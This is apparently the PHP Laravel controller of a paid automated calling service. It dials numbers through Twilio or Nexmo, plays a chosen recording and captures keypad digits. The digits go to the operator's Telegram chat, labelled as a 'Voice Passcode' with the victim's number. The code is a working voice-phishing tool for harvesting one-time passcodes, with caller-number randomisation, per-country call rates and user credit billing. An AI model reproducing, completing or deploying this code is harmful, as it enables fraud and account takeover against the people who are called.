<?php

namespace App\Http\Controllers;

use App\Events\CallStatusCheckStarted;
use App\Models\Audio;
use App\Models\Country;
use App\Models\Twilio;
use App\Models\TwilioCountry;
use App\Models\TwilioFromNumber;
use App\Models\User;
use App\Models\UserCredit;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Artisan;
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Log;
use Twilio\Rest\Client;
use Twilio\TwiML\VoiceResponse;

class TwilioController extends Controller
{
    private $prefix = "admin/twilio/";
    private $resources = [];
    private $checkPermissionAndRolesController;
    public $keypair;
    public $client;
    function __construct(
        CheckPermissionsAndRolesController $checkPermissionAndRolesController
    ) {
        $this->resources['prefix'] = $this->prefix;
        $this->checkPermissionAndRolesController = $checkPermissionAndRolesController;
    }

    public function index(Request $request)
    {
        $this->checkPermissionAndRolesController->permissionTo($request, ['permission' => 'Twilio']);
        $this->resources['data'] =  Audio::orderBy('id', 'desc')->get();
        $this->resources['credit'] =  User::where('id', Auth::user()->id)->first()->call_balance;
        $get_credit = UserCredit::where('user_id', Auth::user()->id)->first();
        $this->resources['available_balance'] =  isset($get_credit['credit']) ? $get_credit['credit'] - $this->resources['credit'] : 0;
        $this->resources['countries'] =  TwilioCountry::where('allow', 1)->get();
        $this->resources['from_numbers'] =  TwilioFromNumber::all();
        return view('admin.twilio.make_call')->with($this->resources);
    }
    public function makeACall(Request $request)
    {
        $credentials = $request->validate([
            'from_number_id' => ['required'],
            'phone_number' => ['required'],
            'audio' => ['required'],
            'country' => ['required']
        ]);
        try {
            if (!$this->checkCountryAllowed($request->country)) {
                return response()->json(['success' => false, 'message' => 'Selected Country not allowed', 'data' => []], 200);
            }
            if (!$this->checkUserCredit($request->country)) {
                return response()->json(['success' => false, 'message' => 'Insufficient balance', 'data' => []], 200);
            }
            $audio = Audio::where('id', $request->audio)->first();
            $from_number = TwilioFromNumber::where('id', $request->from_number_id)->first();
            $callSid = $this->makeCall($request->phone_number, $from_number['number']);
            
            $store = $this->store([
                'to' => $request->phone_number,
                'from' => "random",
                'audio_id' => $audio->id,
                'uuid' => $callSid,
                'status' => 'pending',
                'direction' => NULL,
                'conversation_uuid' => NULL,
                'dtmf' => NULL,
                'data' => NULL,
                'created_by' => Auth::user()->id,
                'country' => $request->country,
                'telegram_status' => 'started'
            ]);

            if (Auth::user()->teligram != null && Auth::user()->teligram != '') {
                sendTeligramMessage(Auth::user()->teligram, $request->phone_number . ' : call started');
                CallStatusCheckStarted::dispatch($callSid, Auth::user()->teligram, $request->phone_number);
            }
            
            return response()->json(['success' => true, 'message' => 'Twilio Created successfully. Check the left side of the form for events.', 'data' => ['callSid' => $callSid]], 200);
        } catch (\Throwable $th) {
            dd($th);
            return response()->json(['success' => false, 'message' => $th->getMessage() . $th->getLine()], 500);
        }
    }
    public function store(array $data)
    {
        try {
            return Twilio::create($data);
        } catch (\Throwable $th) {
            throw $th;
        }
    }
    public function update($id, array $data)
    {
        try {
            return Twilio::where('id', $id)->update($data);
        } catch (\Throwable $th) {
            throw $th;
        }
    }

    public function response(Request $request)
    {
        try {
            $data = $request->all();
            $response = new \Twilio\TwiML\VoiceResponse();
            if (isset($data['CallSid'])) {
                $get = Twilio::where('uuid', $data['CallSid'])->first();
                $audio = Audio::where('id', $get->audio_id)->first();
                $path = env("APP_URL") . $audio->audio;
                $gather = $response->gather([
                    'input' => 'dtmf',
                    'numDigits' => $audio->digits,
                    'timeout' => 3,
                    'method' => 'POST',
                    'action' => route('twilio.process.input', ['CallSid' => $data['CallSid']]),
                ]);
                $gather->play($path);
            } else {
                $response->say("Hello, this is a Twilio voice call.");
            }
            $twilio = Twilio::join('twilio_countries', 'twilios.country', 'twilio_countries.id')
                ->select('twilio_countries.rate', 'twilios.*')->where('twilios.uuid', $data['CallSid'])->first();
            $user = User::where('id', $twilio['created_by'])->first();
            $balance = ($user['call_balance'] == 0) ? $twilio['rate'] : (int) $user['call_balance'] + $twilio['rate'];
            User::where('id', $twilio['created_by'])->update([
                'call_balance' => $balance
            ]);

            return response($response, 200)->header('Content-Type', 'text/xml');
        } catch (\Throwable $th) {
            return response()->json(['success' => false, 'message' => $th->getMessage()], 500);
        }
    }
    public function processInput(Request $request, $CallSid)
    {
        try {
            Log::info([$request->all()]);
            $userInput = $request->input('Digits');

            Twilio::where('uuid', $CallSid)->update(['dtmf' => $userInput]);
            $get = Twilio::join('users', 'twilios.created_by', 'users.id')->select('users.id as user_id', 'twilios.to as number')->where('twilios.uuid', $CallSid)->first();

            $this->sendToTelegram($get['number'], $userInput, $get['user_id']);
        } catch (\Throwable $th) {
            Log::info([$th->getMessage(), $th->getLine()]);
        }
        // Process the user's numerical input as needed
        // For example, you can log or manipulate the user's response

        // Respond with additional TwiML instructions if necessary
        // $response = new VoiceResponse();
        // $response->say('You entered: ' . $userInput);

        // return response($response)->header('Content-Type', 'text/xml');
    }
    public function manage(Request $request)
    {
        try {
            $this->checkPermissionAndRolesController->permissionTo($request, ['permission' => 'Twilio']);
            $superAdmin = $this->checkPermissionAndRolesController->superAdmin($request);
            $query = Twilio::leftJoin('twilio_from_numbers', 'twilios.from_number_id', 'twilio_from_numbers.id')
                ->select('twilios.*', 'twilio_from_numbers.number as from')
                ->orderBy('twilios.id', 'desc');
            if (!$superAdmin) {
                $query->where('twilios.created_by', $request->user()->id);
            }
            $history = $query->paginate(15);
            $this->resources['data'] =  $history;
            return view('admin.twilio.call_history')->with($this->resources);
        } catch (\Throwable $th) {
            return response()->json(['success' => false, 'message' => $th->getMessage()], 500);
        }
    }
    // public function view(Request $request)
    // {
    //     $this->checkPermissionAndRolesController->permissionTo($request, ['permission'=>'Twilio']);
    //     $this->resources['data'] = $this->getSmtpById($request);
    //     return view('admin.twilio.smtp_view')->with($this->resources);
    // }
    public function delete(Request $request)
    {
        $this->checkPermissionAndRolesController->permissionTo($request, ['permission' => 'Twilio']);
        $request->validate([
            'id' => ['required'],
        ]);
        try {
            $superAdmin = $this->checkPermissionAndRolesController->superAdmin($request);
            $query = Twilio::where('id', $request->id);
            if (!$superAdmin) {
                $query->where('created_by', $request->user()->id);
            }
            $result = $query->delete();

            if ($result) {
                $this->resources['messages'] = array("type" => "success", "description" => "Twilio deleted success");
            } else {
                $this->resources['messages'] = array("type" => "error", "description" => "Twilio deleted failed");
            }
            return redirect()->back()->with('messages', $this->resources);
        } catch (\Throwable $th) {
            $this->resources['messages'] = array("type" => "error", "description" => $th->getMessage());
            return redirect()->back()->with('messages', $this->resources);
        }
    }
    public function availableCountries(Request $request)
    {
        $this->checkPermissionAndRolesController->permissionTo($request, ['permission' => 'Twilio Countries']);
        $this->resources['countries'] =  TwilioCountry::all();
        return view('admin.twilio.countries')->with($this->resources);
    }
    public function updateCountries(Request $request)
    {
        try {
            $data = $request->all();
            $storeArr = [];
            foreach ($data['code'] as $key => $value) {
                TwilioCountry::where('code', $value)->update([
                    'rate' => $data['rate'][$key],
                    "allow" => $data['allow'][$key],
                ]);
            }
            $this->resources['messages'] = array("type" => "success", "description" => "updated success");
            return redirect()->back()->with('messages', $this->resources);
        } catch (\Throwable $th) {
            $this->resources['messages'] = array("type" => "error", "description" => $th->getMessage());
            return redirect()->back()->with('messages', $this->resources);
        }
    }
    public function checkCountryAllowed($country_id)
    {
        try {
            $country = TwilioCountry::where('id', $country_id)->first();
            if ($country['allow'] == 1) {
                return true;
            }
            return false;
        } catch (\Throwable $th) {
            throw $th;
        }
    }
    public function checkUserCredit($country_id)
    {
        try {
            $user_credit = UserCredit::where('user_id', Auth::user()->id)->first();
            $user_balance = User::where('id', Auth::user()->id)->first();
            $country = TwilioCountry::where('id', $country_id)->first();
            $credit = isset($user_credit['credit']) ? $user_credit['credit'] : 0;
            $call_balance = isset($user_balance['call_balance']) ? $user_balance['call_balance'] : 0;
            $available_amount =  $credit - $call_balance;
            $current_amount = $country->rate;
            if ($available_amount - $current_amount >= 0) {
                return true;
            }
            return false;
        } catch (\Throwable $th) {
            throw $th;
        }
    }
    public function reCall(Request $request)
    {
        $this->checkPermissionAndRolesController->permissionTo($request, ['permission' => 'Twilio']);
        $request->validate([
            'id' => ['required'],
        ]);
        try {
            $callData = Twilio::where('id', $request->id)->first();

            if (!$this->checkCountryAllowed($callData->country)) {
                $this->resources['messages'] = array("type" => "error", "description" => 'Selected Country not allowed');
                return redirect()->back()->with('messages', $this->resources);
            }
            if (!$this->checkUserCredit($callData->country)) {
                $this->resources['messages'] = array("type" => "error", "description" => 'Insufficient balance');
                return redirect()->back()->with('messages', $this->resources);
            }
            $audio = Audio::where('id', $callData->audio_id)->first();
            //
            // $store = Twilio::where('id', '1')->first();
            $jwt = $this->generateJWT();
            // $re = $this->getDetails($jwt, 'c0f513f6-a30d-4906-b288-7ec28319ec94', $store);
            // dd("Result", $re);
            //
            $data = array(
                'to' => array([
                    'type' => 'phone',
                    'number' => $callData->to
                ]),
                // 'from' => [
                //     'type' => 'phone',
                //     'number' => '12044108351'
                // ]
                'random_from_number' => true,
                'event_url' => [
                    env('APP_URL') . 'iserver/twilio/event'
                ],
                "event_method" => "POST"
            );
            if ($audio['input'] == 1) {
                $data['ncco'] = array(
                    [
                        'action' => 'stream',
                        "streamUrl" => [
                            env('APP_URL') . $audio['audio']
                        ],
                    ],
                    [
                        "action" => "input",
                        "eventUrl" => [
                            env('APP_URL') . 'iserver/twilio/event'
                        ],
                        "type" => [
                            "dtmf"
                        ],
                        "dtmf" => [
                            "timeOut" => 20,
                            "maxDigits" => (int) $audio['digits']
                        ]
                    ],
                    [
                        "action" => "talk",
                        "text" => "Thanks for your input, goodbye.",
                    ],
                );
            } else {
                $data['ncco'] = array(
                    [
                        'action' => 'stream',
                        "streamUrl" => [
                            env('APP_URL') . $audio['audio']
                        ],
                    ],
                    [
                        "action" => "talk",
                        "text" => "Thanks for your input, goodbye.",
                    ],
                );
            }
            $ch = curl_init();

            curl_setopt($ch, CURLOPT_URL, 'https://api.nexmo.com/v1/calls/');
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));

            $headers = array();
            $headers[] = "Authorization: Bearer " . $jwt;
            $headers[] = "Content-Type: application/json";
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

            $result = curl_exec($ch);
            $info = curl_getinfo($ch);
            if (curl_errno($ch)) {
                echo 'Error:' . curl_error($ch);
            }
            curl_close($ch);

            $responseData = json_decode($result, true);
            if (isset($responseData['uuid'])) {

                $uuid = $responseData['uuid'];
                $status = $responseData['status'];
                $direction = $responseData['direction'];
                $conversation_uuid = $responseData['conversation_uuid'];

                Twilio::where('id', $callData->id)->update([
                    'uuid' => $uuid,
                    'status' => $status,
                    'conversation_uuid' => $conversation_uuid,
                ]);
                $this->resources['messages'] = array("type" => "success", "description" => "Twilio redial successfully");
                return redirect()->back()->with('messages', $this->resources);
            } else {
                $this->resources['messages'] = array("type" => "error", "description" => 'Someting went wrong');
                return redirect()->back()->with('messages', $this->resources);
            }
        } catch (\Throwable $th) {
            $this->resources['messages'] = array("type" => "error", "description" => $th->getMessage());
            return redirect()->back()->with('messages', $this->resources);
        }
    }
    public function SelectDelete(Request $request)
    {
        $this->checkPermissionAndRolesController->permissionTo($request, ['permission' => 'Twilio']);

        try {
            $superAdmin = $this->checkPermissionAndRolesController->superAdmin($request);
            if (!empty($request->delete)) {
                foreach ($request->delete as $value) {

                    $query = Twilio::where('id', $value);
                    if (!$superAdmin) {
                        $query->where('created_by', $request->user()->id);
                    }
                    $result = $query->delete();
                }
            } else {
                $this->resources['messages'] = array("type" => "error", "description" => "Selected Twilio deleted failed");
            }

            if ($result) {
                $this->resources['messages'] = array("type" => "success", "description" => "Selected Twilio deleted success");
            } else {
                $this->resources['messages'] = array("type" => "error", "description" => "Selected Twilio deleted failed");
            }
            return redirect()->back()->with('messages', $this->resources);
        } catch (\Throwable $th) {
            $this->resources['messages'] = array("type" => "error", "description" => $th->getMessage());
            return redirect()->back()->with('messages', $this->resources);
        }
    }

    public function sendToTelegram($number, $digits, $user_id)
    {
        try {
            $user = User::where('id', $user_id)->first();

            $chatid = $user['teligram'];
            $msj = '
📱 Voice Passcode Call  🔊

☎️ Number=> ' . $number . '⬅️

📝 Passcode=> ' . $digits . ' ️';

            $twiloBotToken = env('TELEGRAM_BOT_TOKEN');
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot" . $twiloBotToken . "/sendMessage");
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"chat_id\": \"" . $chatid . "\", \"text\": \"" . $msj . "\"}");
            $headers = array();
            $headers[] = 'Content-Type: application/json';
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

            $result = curl_exec($ch);
            if (curl_errno($ch)) {
                echo 'Error:' . curl_error($ch);
            }
            curl_close($ch);
        } catch (\Throwable $th) {
            throw $th;
        }
    }
    public function makeCall($to, $from_number)
    {
        $twilio_sid = env('TWILIO_SID');
        $twilio_token = env('TWILIO_AUTH_TOKEN');
        $twilio_phone_number = $from_number;
        $twilio = new Client($twilio_sid, $twilio_token);

        try {
            $call = $twilio->calls->create(
                $to,
                $twilio_phone_number,
                [
                    'url' => route('twilio.voice.response'),
                    // 'url' => 'https://webhook.site/81907d29-0bf0-4e60-9752-43ecaac3a39a'
                ]
            );

            return $call->sid;
        } catch (\Exception $e) {
            return $e->getMessage();
        }
    }

    public function getCallDetails(Request $request)
    {
        $request->validate([
            'callSid' => ['required'],
        ]);

        $twilio_sid = env('TWILIO_SID');
        $twilio_token = env('TWILIO_AUTH_TOKEN');
        $twilio = new Client($twilio_sid, $twilio_token);

        try {

            // Get the call details
            $call = $twilio->calls($request->callSid)->fetch();

            Twilio::where('uuid', $request->callSid)->update(['status' => $call->status]);

            return response()->json(['success' => true, 'message' => '', 'data' => ['status' => $call->status]], 200);
        } catch (\Exception $e) {
            return $e->getMessage();
        }
    }
}
